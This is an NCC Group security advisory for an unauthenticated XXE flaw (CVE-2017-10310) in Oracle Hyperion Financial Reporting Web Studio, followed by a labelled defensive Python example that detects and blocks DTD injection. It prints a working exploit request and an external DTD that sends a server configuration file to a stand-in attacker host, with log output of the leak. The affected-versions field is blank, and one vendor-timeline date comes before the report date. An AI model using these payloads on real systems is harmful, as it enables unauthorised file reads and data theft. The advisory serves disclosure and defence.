Unauthenticated XML eXternal Entity (XXE) vulnerability

Vendor: Oracle
Vendor URL: http://www.oracle.com/ 
Versions affected: (previous versions may also be affected)
Systems Affected: Oracle Hyperion Financial Reporting Web Studio
Author: Mathew Nash Mathew.Nash[at]nccgroup[dot]trust, Fabio Pires Fabio.pires[at]nccgroup[dot]trust
Advisory URL: http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html 
CVE Identifier: CVE-2017-10310
Risk: High (Unauthenticated local file read, server-side request forgery or denial of service)


The XML parser of the Oracle Hyperion Financial Reporting Web Studio is configured to process a document type definition (DTD) supplied by the user. An unauthenticated attacker can therefore abuse this misconfiguration of the XML processor to read arbitrary files on the host system. Variations of the same payload also yield directory listings, server-side requests, or a denial of service.


A vulnerable endpoint was found in the login page of the Oracle Hyperion Financial Reporting Web Studio.


The confidentiality of the system can be highly affected. Because the attack is a POST request against the login endpoint, most servers will not be configured to log the POST data; and because the attack is unauthenticated, it would be hard to find evidence that it occurred or to determine what information was obtained through successful exploitation.


The following POST request shows an example of how the vulnerability might be exploited:

POST /frdesigner/faces/login?_adf.ctrl-state=9p4b9h3ea_4 HTTP/1.1
Host: <application host>
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 394

pt_sf1:domainIpTxt=&pt_sf1:userIpTxt=AAAAAAAAAAAAAA&pt_sf1:passwdIpTxt=AAAAAAAAAAAAAA&pt_sf1:soc1=29&it1=&ins1=1&ic1=&iclov1=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!1191fgdbmc&event=pt_sf1:authBtn&event.pt_sf1:authBtn=<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://ATTACKER_IP_ADDRESS/xxe_file"> %pe; %param1; %external;]><m xmlns="http://oracle.com/richClient/comm"><k v="type"><s>action</s></k></m>

Before submitting the request, a DTD named ‘xxe_file’ can be created on the attacker’s machine with the content below:

<!ENTITY % payload SYSTEM "file:///d:\\Oracle\\Middleware\\user_projects\\domains\\EPMSystem\\config\\config.xml">
<!ENTITY % param1 "<!ENTITY &#x25; external SYSTEM 'http://ATTACKERS_IP_ADDRESS/log_xxe?data=%payload;'>">

After the request is submitted, the server is seen making a connection to ATTACKER_IP_ADDRESS with the content of ‘config.xml’ in the query string of the request, as evidenced below:

$ python -m SimpleHTTPServer 80
[server_ip] - - [30/Mar/2017 15:27:23] "GET /log_xxe?data=<domain xmlns="http://xmlns.oracle.com/weblogic/domain" xmlns:sec="http://xmlns.oracle.com/weblogic/security" xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd">
<sec:authentication-provider xsi:type="wls:default-authenticatorType">

It is also possible to list files and directories located in the local filesystem by changing the value of the entity ‘payload’ to a path similar to the below:

<!ENTITY % payload SYSTEM "file:///d:\\Oracle\\Middleware\\user_projects\\domains\\EPMSystem\\">


Oracle have released a patch for this vulnerability which should be applied:

The implementation of the XML processor should be reviewed and consideration should be given to disabling entity definition parsing. The application should be reconfigured so it does not allow users to inject arbitrary code in the XML document’s preamble. The XML processor should also be configured to use a local static DTD and disallow any declared DTD included in the XML document.
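The two defender-side points above (POST bodies are not normally logged, and the XML processor should reject any DTD carried in the document) can be demonstrated together. The following is an added example, not code from the advisory, from NCC Group or from Oracle; it uses the Python standard library's expat binding rather than the product's Java parser to show the recommended configuration, and the form field names, the placeholder host placeholder.invalid and the sample bodies are constructed for illustration.

```python
"""Added example (not from the advisory): two defender-side checks for the
DTD-injection pattern described above, using only the Python standard library.

1. inspect_form_body(): scans url-encoded POST data for fields that smuggle a
   DOCTYPE or entity declaration, since the access log will not record bodies.
2. parse_without_dtd(): an expat parser configured the way the recommendation
   describes: any DOCTYPE is rejected and parameter/external entities are
   never resolved, so an injected preamble cannot reach the filesystem.
"""
import re
from urllib.parse import parse_qs, quote
from xml.parsers import expat

# Matches the preamble constructs a DTD-injection payload needs: a document
# type declaration or an (optionally parameter) entity declaration.
DTD_PATTERN = re.compile(r"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Constructed samples. The benign message mirrors the ADF-style body in the
# advisory; the injected one prepends a DOCTYPE pointing at a placeholder host.
BENIGN_XML = b'<m xmlns="http://oracle.com/richClient/comm"><k v="type"><s>action</s></k></m>'
INJECTED_XML = (
    b'<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://placeholder.invalid/xxe_file"> %pe; ]>'
    + BENIGN_XML
)
_PREFIX = "pt_sf1:userIpTxt=alice&pt_sf1:passwdIpTxt=secret&event=pt_sf1:authBtn"
BENIGN_BODY = _PREFIX + "&event.pt_sf1:authBtn=" + quote(BENIGN_XML.decode())
INJECTED_BODY = _PREFIX + "&event.pt_sf1:authBtn=" + quote(INJECTED_XML.decode())


class DtdNotAllowed(ValueError):
    """Raised when a document carries an inline or external DTD."""


def inspect_form_body(body: str) -> list:
    """Return the names of form fields whose value contains a DTD construct.

    The body is application/x-www-form-urlencoded text; values are decoded
    before matching so percent-encoded payloads are caught as well.
    """
    suspicious = []
    for field, values in parse_qs(body, keep_blank_values=True).items():
        if any(DTD_PATTERN.search(v) for v in values):
            suspicious.append(field)
    return suspicious


def parse_without_dtd(data: bytes) -> list:
    """Parse XML while refusing DTDs; return element names in document order."""
    parser = expat.ParserCreate()
    # Never read parameter entities, so a "%pe;" reference cannot trigger a
    # fetch of an externally hosted DTD.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    names = []

    def start_doctype(doctype_name, system_id, public_id, has_internal_subset):
        # Reject the preamble outright instead of trying to sanitise it.
        raise DtdNotAllowed("DOCTYPE %r is not allowed" % doctype_name)

    def external_entity(context, base, system_id, public_id):
        # Returning 0 aborts the parse rather than opening system_id
        # (which could be a file:// or http:// URL).
        return 0

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(data, True)
    return names


if __name__ == "__main__":
    print("benign body flags:", inspect_form_body(BENIGN_BODY))
    print("injected body flags:", inspect_form_body(INJECTED_BODY))
    print("benign parse:", parse_without_dtd(BENIGN_XML))
    try:
        parse_without_dtd(INJECTED_XML)
    except DtdNotAllowed as exc:
        print("injected parse rejected:", exc)
```

The form-body check is the kind of rule a reverse proxy or WAF can apply before the request reaches the application, which is where logging the decision is practical; the parser configuration is the application-side fix, and rejecting the DOCTYPE before any entity is declared is simpler and safer than trying to allow some DTDs and not others.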

Vendor communication

Advisory reported to Oracle: 31/03/2017
Oracle acknowledgement: 04/03/2017
Oracle requested more details: 06/04/2017
Details provided: 07/04/2017
Oracle status report (Issue fixed in main codeline): 25/04/2017
Patch released: 17/10/2017

About NCC Group

NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the internet safer and revolutionising the way in which organisations think about cybersecurity.

Written by: Fabio Pires

Published date:  03 November 2017
